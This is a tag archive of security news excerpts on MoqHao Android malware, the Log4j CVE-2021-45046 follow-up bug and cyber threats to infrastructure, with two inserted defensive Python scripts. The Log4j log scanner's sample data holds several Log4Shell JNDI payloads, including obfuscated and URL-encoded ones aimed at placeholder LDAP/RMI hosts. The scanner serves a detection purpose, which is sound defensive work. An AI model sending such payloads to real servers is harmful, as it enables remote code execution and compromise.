Tag Archive for: immense

MoqHao Evolution Poses Immense Threat to Android Users


Security researchers have recently discovered a new variant of the Android malware XLoader, better known as MoqHao, whose malicious code runs automatically once the app is installed, without the victim having to open it. Termed the MoqHao evolution, this is a new version of the infamous Android malware that has long been linked to Roaming Mantis, a financially motivated, China-based threat group.

In this article, we will explore the background of the MoqHao evolution and see how it operates differently from its earlier variants.

 

MoqHao Evolution – A Timeline


MoqHao is an Android phishing threat that first appeared in 2015. The threat actors behind it initiated attacks through phishing over SMS, also referred to as "smishing," in Asia. The main targets of MoqHao were Japan, South Korea, and Bangladesh.

However, it later spread to European countries such as France and Germany, which drew the attention of many security researchers. They deemed it a serious threat because this Android malware had already defrauded thousands of users.

Recent reports mention that this Android malware now operates in 27 languages, up from 4 at the start, which shows how broad its target base has become.


What Has Changed In MoqHao?


The biggest difference between earlier variants of this Android malware and the latest one is that the new variant no longer needs the user to launch the app. Earlier variants required the victim to install and then open the malicious app. In the new variant, once the victim follows the installation link received in an SMS message and installs the app, the malicious code executes automatically without the app ever being opened.


How The Evolved MoqHao Operates


Understanding how the malware operates is essential for developing defensive strategies. It masquerades as legitimate apps such as the Chrome web browser by using Unicode strings in its app name. However, careful users can spot it, because the name of the software appears slightly…
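The Unicode masquerading described above is something a mobile security team can screen for when triaging sideloaded APKs. The following Python script is an added example, not code from this article or from the researchers who analysed MoqHao: it normalises an app label (NFKC, strips invisible format characters, case-folds, and maps a small, assumed set of Cyrillic and Greek look-alike letters to Latin) and compares the result with the canonical label of a brand the malware is known to impersonate. The brand list, the confusable table and the sample labels are constructed for the example; the page only says that MoqHao impersonates Chrome and that its name differs slightly from the real one.

```python
import unicodedata
from typing import Dict, List, Tuple

# Canonical labels of apps the dropper is known to impersonate.  The page names
# Chrome; the second entry is an assumption added for the example.
CANONICAL_LABELS: Dict[str, str] = {
    "chrome": "Chrome",
    "google chrome": "Google Chrome",
}

# Assumed, deliberately small table of Cyrillic/Greek letters that render like
# Latin ones and survive NFKC untouched (a real deployment would use a full
# confusables list such as Unicode TR39).
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u03bf": "o",
})


def normalize_label(label: str) -> str:
    """Reduce a display label to a comparable key.

    NFKC folds full-width and stylised letters to plain ones; format (Cf) and
    combining (Mn) characters such as zero-width spaces are dropped; case is
    folded; known confusables are mapped; runs of whitespace are collapsed.
    """
    folded = unicodedata.normalize("NFKC", label)
    folded = "".join(ch for ch in folded
                     if unicodedata.category(ch) not in ("Cf", "Mn"))
    folded = folded.casefold().translate(CONFUSABLES)
    return " ".join(folded.split())


def non_ascii_chars(label: str) -> List[Tuple[str, str]]:
    """Characters outside ASCII with their Unicode names, for the analyst."""
    return [(ch, unicodedata.name(ch, "UNKNOWN")) for ch in label if ord(ch) > 0x7F]


def check_label(label: str) -> dict:
    """Classify an app label as canonical, lookalike, or unknown."""
    key = normalize_label(label)
    canonical = CANONICAL_LABELS.get(key)
    if canonical is None:
        verdict = "unknown"      # not a brand we track; needs other checks
    elif label == canonical:
        verdict = "canonical"    # exact spelling; still verify package + signer
    else:
        verdict = "lookalike"    # resolves to a brand but is not spelled like it
    return {"label": label, "normalized": key,
            "non_ascii": non_ascii_chars(label), "verdict": verdict}


# Constructed sample labels (not taken from a real MoqHao sample).
SAMPLE_LABELS = [
    "Chrome",          # genuine spelling
    "chrome",          # lower-case variant
    "\uff23hrome",     # full-width C
    "Chr\u200bome",    # zero-width space inserted
    "\u0421hrome",     # Cyrillic capital Es instead of Latin C
    "Calculator",      # unrelated app
]

if __name__ == "__main__":
    for item in SAMPLE_LABELS:
        r = check_label(item)
        print(f"{r['verdict']:10s} {r['label']!r:16s} -> {r['normalized']!r} {r['non_ascii']}")
```

A label check like this is only a triage signal. The decisive checks for a suspected impostor are the package name and the signing certificate, compared with the genuine app's; a lookalike label with a different signer is the case the article describes.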

Source…

Internet Faces Immense Risk As 2nd Serious Exploit Found, Patch Released



As the Internet faces one of the most serious vulnerabilities in recent years, putting millions of devices at risk of compromise, attackers are now making thousands of attempts to exploit a second vulnerability in the Java logging library Apache Log4j 2.

The description of the new vulnerability, CVE-2021-45046, says the fix for the earlier bug (CVE-2021-44228) in Apache Log4j 2.15.0 was "incomplete in certain non-default configurations".

“It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.

“This could allow attackers… to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack,” the CVE description read.

Several popular services, including Apple iCloud, Amazon, Twitter, Cloudflare and Minecraft, were reported to be exposed to the 'ubiquitous' zero-day exploit.

Apache has now released a new security patch, Log4j 2.16.0, to address the second bug; that release removes message lookups and disables JNDI by default.

‘Apache Log4j’ is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services.

It is the most popular Java logging library, with over 400,000 downloads from its GitHub project. It is used by a vast number of companies worldwide, providing logging for a wide set of popular applications.

“Exploiting this vulnerability is simple and allows threat actors to control java-based web servers and launch remote code execution attacks,” cyber security researchers at Check Point had said in a blog post.

Another cyber security company Sophos said that it is already detecting malicious cryptominer operations attempting to leverage the vulnerability, and there are credible reports from other sources that several automated botnets (such as Mirai, Tsunami, and Kinsing) have begun to exploit it as well.
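The detections Sophos describes rest on one question a defender can answer from their own logs: which requests carried a Log4j lookup payload. The Python script below is an added example, not Sophos', Check Point's or Microsoft's detection logic: it emulates the small subset of Log4j 2 lookup semantics that attackers use to obfuscate the word "jndi" (the "lower:"/"upper:" lookups and the ":-default" syntax), expands nested lookups innermost-first the way Log4j does, URL-decodes first, and reports the JNDI target for each hit. The access-log lines are constructed for the example, with documentation IP addresses; the function names are the example's own. The same check applies to any attacker-controlled field that reaches the logger, including the thread-context data that CVE-2021-45046 concerns.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# An innermost Log4j 2 lookup: "${" ... "}" with no further "${" or "}" inside.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def resolve_lookup(body: str) -> str:
    """Emulate the subset of Log4j 2 lookup semantics abused for obfuscation.

    - "name:-default" (including the bare "::-x" form) yields the default value
    - "lower:X" / "upper:X" change the case of X
    - any other lookup is left as plain text so the expansion terminates
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, key = body.partition(":")
    if sep and prefix.lower() == "lower":
        return key.lower()
    if sep and prefix.lower() == "upper":
        return key.upper()
    return body


def find_jndi_target(text: str, max_rounds: int = 64) -> Optional[str]:
    """Return the JNDI target hidden in text, or None if no JNDI lookup appears.

    Lookups are expanded innermost-first, the order Log4j itself uses, so that
    "${${lower:j}ndi:...}" collapses to "${jndi:...}" before being checked.
    """
    # Payloads in request logs are often URL-encoded, sometimes more than once.
    while (decoded := unquote(text)) != text:
        text = decoded
    for _ in range(max_rounds):
        match = INNER_LOOKUP.search(text)
        if match is None:
            return None
        body = match.group(1)
        if body.lower().startswith("jndi:"):
            return body[len("jndi:"):]
        text = text[:match.start()] + resolve_lookup(body) + text[match.end():]
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, JNDI target) for every line carrying a lookup payload."""
    findings = []
    for number, line in enumerate(lines, start=1):
        target = find_jndi_target(line)
        if target is not None:
            findings.append((number, target))
    return findings


# Constructed sample access log (RFC 5737 addresses); not real traffic.
SAMPLE_ACCESS_LOG = [
    # benign request
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain CVE-2021-44228 probe in the User-Agent
    '198.51.100.7 - - [13/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    # case and default-value obfuscation of the word "jndi"
    '198.51.100.7 - - [13/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://198.51.100.7:1389/b}"',
    # URL-encoded payload in the query string
    '198.51.100.9 - - [13/Dec/2021:10:01:05 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    # a lookup that is not JNDI (should not fire)
    '203.0.113.6 - - [13/Dec/2021:10:01:06 +0000] "GET /?msg=${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, target in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: JNDI lookup -> {target}")
```

Running it against the sample reports lines 2, 3 and 4 and ignores the harmless `${date:yyyy}` on line 5. Because the expansion mirrors the logger's own behaviour, new spellings of the same trick (different case, other default-value lookups) still collapse to `jndi:` instead of needing a fresh regex for each variant.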

At present, most of the attacks focus on cryptocurrency mining at the victims' expense. However, under cover of that noise, more advanced attackers may move aggressively against high-value targets.

Researchers at Microsoft have also warned about attacks attempting to take advantage of ‘Log4j’ vulnerabilities,…

Source…

Valley News – Column: Data is immensely powerful, and it creates immense vulnerabilities


America created cyberspace in its own image — free, open, decentralized, distributed and self-governing. If the internet had been created in China or Russia, its architecture would have been very different. Unfortunately, its very openness and freedom have become the source of its vulnerabilities.

Authoritarian nations find the freedom of cyberspace very threatening. They build firewalls to protect their societies from freedom. For geopolitical reasons, they also use cyber weapons to attack others.

One of the most attractive features of cyberspace is that its entry threshold is so low that an ingenious, self-taught person can create apps and new platforms and become rich, or become a hacker and get into infrastructure, financial or military systems without leaving a trace. Rogue states and well-organized digital terrorist groups use footloose hackers to steal intellectual property and pry into diplomatic and strategic plans.

Cyberattacks are stealthy and insidious. There are no rules of the road to protect cyberspace, the domain in which all our activities, military, economic, commercial, political and cultural, are now conducted. Power grids, financial systems and defense networks could be brought down, not only by hostile states but also by nonstate actors, alone or in collusion with their governments. Last October, a cyberattack shut down the electrical grid of Mumbai, India's financial capital, plunging millions into darkness. The New York Times suggested that it was a Chinese cyberattack, a warning that China could fight India not only in the Himalayas but also in its financial hub.

The May 7 ransomware attack on Colonial Pipeline, one of America's largest fuel suppliers, was carried out by affiliates of a criminal hacking group, DarkSide. The attack crippled Colonial's computer systems, and the company paid a ransom in cryptocurrency of 75 bitcoins, nearly $5 million, according to media reports. Cryptocurrency based on blockchain technology is a possible future for global finance. Ransom paid in cryptocurrency is difficult, though not impossible, to trace.

One of America’s most precious assets, intellectual property, is under constant threat. Chinese hackers have been…

Source…